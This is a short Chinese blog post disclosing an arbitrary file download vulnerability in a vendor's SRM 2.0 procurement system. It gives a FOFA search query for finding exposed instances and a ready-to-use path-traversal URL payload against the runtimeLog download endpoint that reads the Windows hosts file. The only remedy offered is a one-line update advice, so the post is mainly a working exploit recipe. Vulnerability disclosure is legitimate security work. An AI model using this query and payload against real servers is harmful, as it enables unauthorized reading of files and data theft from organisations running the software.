某云彩SRM2.0任意文件下载漏洞

文章目录

免责申明

本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任

搜索语法

fofa

复制代码
icon_hash="1665918155"

漏洞描述

某云采 SRM2.0是一款先进的供应链管理系统,旨在优化企业的采购流程和供应商管理。该系统通过云端技术,提供实时的数据分析和智能决策支持,帮助企业提高采购效率和降低成本。

该系统download在接口处存在任意文件下载漏洞

漏洞复现

payload

复制代码
http://ip/adpweb/static/%2e%2e;/a/sys/runtimeLog/download?path=C:\Windows\System32\drivers\etc\hosts


修复建议

更新到最新版本

相关推荐
菩提小狗8 小时前
每日安全情报报告 · 2026-07-04
网络安全·漏洞·cve·安全情报·每日安全
菩提小狗1 天前
每日安全情报报告 · 2026-07-03
网络安全·漏洞·cve·安全情报·每日安全
菩提小狗1 天前
每日安全情报报告 · 2026-07-01
网络安全·漏洞·cve·安全情报·每日安全
见青..20 天前
文件上传漏洞之原理、探测、利用、绕过、防御
web安全·网络安全·漏洞·文件上传
网络研究院21 天前
网络研究观-严重漏洞允许以 root 用户身份执行任意命令:CVE-2026-0273 分析
网络·安全·漏洞·修复·设备
阿昭L23 天前
Windows堆dword shoot
windows·安全·漏洞·堆溢出
南山丶无梅落25 天前
文件上传漏洞2
漏洞·文件上传·网安·条件竞争·二次渲染·0x00截断·图片马
菩提小狗1 个月前
每日安全情报报告 · 2026-06-04
网络安全·漏洞·cve·安全情报·每日安全
菩提小狗1 个月前
每日安全情报报告 · 2026-06-03
网络安全·漏洞·cve·安全情报·每日安全
南山丶无梅落1 个月前
XXE漏洞
xml·漏洞·xxe·网安